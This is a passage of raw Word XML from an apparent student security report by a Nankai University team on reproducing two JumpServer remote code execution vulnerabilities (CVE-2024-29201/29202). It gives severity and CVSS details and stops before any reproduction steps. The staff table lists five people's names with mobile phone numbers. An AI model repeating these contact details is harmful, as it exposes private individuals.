        <w:t>（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分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="7F5E8A81" w14:textId="3A939A02" w:rsidR="00C60920" w:rsidRDefault="005C65F0" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>南开大学第五组的安全人员采用科学的漏洞复现步骤于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日至</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日对目标漏洞进行了全面深入的漏洞复现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F470D8" w14:textId="50C8BB00" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本次共发现漏洞</w:t>
      </w:r>
      <w:r w:rsidR="005C65F0">
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个，其高危漏洞</w:t>
      </w:r>
      <w:r w:rsidR="005C65F0">
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个，中危漏洞</w:t>
      </w:r>
      <w:r w:rsidR="005C65F0">
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>低危漏洞</w:t>
      </w:r>
      <w:r w:rsidR="005C65F0">
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个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5"/>
        <w:gridCol w:w="4714"/>
        <w:gridCol w:w="2213"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C60920" w14:paraId="084B86F4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="049A0396" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
            <w:pPr>
              <w:pStyle w:val="20"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0" w:firstLine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</w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="3" w:name="_Hlk482954515"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="宋体"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4714" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2388414C" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
            <w:pPr>
              <w:pStyle w:val="20"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0" w:firstLine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/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D3DD61A" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
            <w:pPr>
              <w:pStyle w:val="20"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="宋体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宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>风险值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="420A7CE5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="713"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5484FA82" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"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4714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C8B2C17" w14:textId="0932A653" w:rsidR="00C60920" w:rsidRDefault="001C2869" w:rsidP="00854BD6">
            <w:pPr>
              <w:spacing w:after="156" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C2869">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>JumpServer</w:t>
            </w:r>
            <w:r w:rsidRPr="001C2869">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>远程代码执行漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>(CVE-2024-29201)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5227202F" w14:textId="7EE40D63" w:rsidR="00C60920" w:rsidRDefault="001C2869" w:rsidP="00854BD6">
            <w:pPr>
              <w:spacing w:after="156" w:line="276" w:lineRule="auto"/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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="036AF342" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="712"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27664485" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"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4714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="195F684D" w14:textId="58D8593B" w:rsidR="00C60920" w:rsidRDefault="001C2869" w:rsidP="00854BD6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1C2869">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>JumpServer</w:t>
            </w:r>
            <w:r w:rsidRPr="001C2869">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>远程代码执行漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>(CVE-2024-29202)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C311E79" w14:textId="56B9EDCA" w:rsidR="00C60920" w:rsidRDefault="001C2869" w:rsidP="00854BD6">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="276" w:lineRule="auto"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>
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EDBB411" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc16656"/>
      <w:bookmarkStart w:id="5" w:name="_Toc5011"/>
      <w:bookmarkStart w:id="6" w:name="_Toc172983142"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级分布</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="3D97B928" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次评估漏洞的详细风险等级分布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87"/>
        <w:gridCol w:w="5335"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A64E20" w14:paraId="54F96319" w14:textId="77777777" w:rsidTr="00222538">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26BD4A06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漏洞级别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46CD81CD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超危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A64E20" w14:paraId="435BD743" w14:textId="77777777" w:rsidTr="00222538">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E5B96D0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攻击复杂度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AB59683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低</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A64E20" w14:paraId="5F922E49" w14:textId="77777777" w:rsidTr="00222538">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="355DFD9B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机密性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71D6FC19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A64E20" w14:paraId="7BA77D8D" w14:textId="77777777" w:rsidTr="00222538">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0606933F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完整性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="454B7A81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A64E20" w14:paraId="16D6369A" w14:textId="77777777" w:rsidTr="00222538">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6388907E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可用性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="091C1ECC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高</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A64E20" w14:paraId="73DD5355" w14:textId="77777777" w:rsidTr="00222538">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32F97827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CVSS2.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>评分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27835194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AV:N/AC:L/Au:N/C:P/I:P/A:P</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A64E20" w14:paraId="44054057" w14:textId="77777777" w:rsidTr="00222538">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CD2E968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2.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基本评分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1250E246" w14:textId="5D87C578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7.</w:t>
            </w:r>
            <w:r w:rsidR="00366D37">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A64E20" w14:paraId="18FCC58B" w14:textId="77777777" w:rsidTr="00222538">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18822A31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CVSS3.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>评分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54995272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CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A64E20" w14:paraId="1D4E0320" w14:textId="77777777" w:rsidTr="00222538">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34332F14" w14:textId="77777777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</w:rPr>
              <w:t>基本评分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AA1D3FB" w14:textId="4ECC2F1F" w:rsidR="00A64E20" w:rsidRDefault="00A64E20" w:rsidP="00854BD6">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>9.</w:t>
            </w:r>
            <w:r w:rsidR="00DC1C4A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23400C9E" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc32430"/>
      <w:bookmarkStart w:id="8" w:name="_Toc8277"/>
      <w:bookmarkStart w:id="9" w:name="_Toc172983143"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作计划</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/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分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="6B30D00E" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc21093"/>
      <w:bookmarkStart w:id="11" w:name="_Toc10156"/>
      <w:bookmarkStart w:id="12" w:name="_Toc172983144"/>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作人员</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1974" w:tblpY="256"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="8170" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="802"/>
        <w:gridCol w:w="1722"/>
        <w:gridCol w:w="1138"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C60920" w14:paraId="45C983AC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="697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AAA9971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序号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DCD58F3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职务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9DA0E0A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姓名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D594C1B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联系方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="5BBBFFCB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ECD2B7C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1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00A1143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长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D44E952" w14:textId="55ED538F" w:rsidR="00C60920" w:rsidRDefault="0078527B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侯博文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7B7A82F" w14:textId="3D19B0DD" w:rsidR="00C60920" w:rsidRDefault="00EF4596" w:rsidP="00854BD6">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia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13022498745</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="08ABB54E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650FE2A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2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C336EEA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C330928" w14:textId="0CAB70BD" w:rsidR="00C60920" w:rsidRDefault="0078527B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郝志成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F33101" w14:textId="42E7CC82" w:rsidR="00C60920" w:rsidRDefault="00E62A07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 w:rsidRPr="006A7170">
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>15063560713</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="0505BEFF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E571ED1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/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>3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461B95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F9CECEF" w14:textId="2810C9B2" w:rsidR="00C60920" w:rsidRDefault="0078527B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陆皓喆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323A6371" w14:textId="25979F72" w:rsidR="00C60920" w:rsidRDefault="0078527B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15058298819</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="28C6E835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87CE10D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4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9D29433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8C589F" w14:textId="27166CA2" w:rsidR="00C60920" w:rsidRDefault="0078527B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秦德龙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09309B6A" w14:textId="6EBB9EAD" w:rsidR="00C60920" w:rsidRDefault="009718CF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ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>16622753767</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="761F1F25" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="376"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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1C703A8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lastRenderedPageBreak/>
              <w:t>5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7AE42C07" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000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组员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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E7A0D3E" w14:textId="22525AD2" w:rsidR="00C60920" w:rsidRDefault="0078527B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胡博浩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B5AD160" w14:textId="3336269E" w:rsidR="00C60920" w:rsidRDefault="00E62A07" w:rsidP="00854BD6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 w:rsidRPr="006A7170">
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>18270856986</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2597BA58" w14:textId="3948D047" w:rsidR="009547AE" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc19764"/>
      <w:bookmarkStart w:id="14" w:name="_Toc18367"/>
      <w:bookmarkStart w:id="15" w:name="_Toc172983145"/>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞对象</w:t>
      </w:r>
      <w:bookmarkStart w:id="16" w:name="_Toc33"/>
      <w:bookmarkStart w:id="17" w:name="_Toc5023"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="1A653FAF" w14:textId="5620566E" w:rsidR="009547AE" w:rsidRPr="009547AE" w:rsidRDefault="009547AE" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="009547AE">
        <w:t>JumpServer</w:t>
      </w:r>
      <w:r w:rsidRPr="009547AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开源堡垒机采用了分布式架构设计</w:t>
      </w:r>
      <w:r w:rsidR="00A96F31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009547AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用容器化的部署方式，支持多种资产类型和大规模资产纳管</w:t>
      </w:r>
      <w:r w:rsidR="00AF29BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009547AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以支持高并发访问，满足企业用户在混合</w:t>
      </w:r>
      <w:r w:rsidRPr="009547AE">
        <w:t>IT</w:t>
      </w:r>
      <w:r w:rsidRPr="009547AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境中的运维安全审计需求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222FB775" w14:textId="31B91CEF" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc172983146"/>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现阶段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
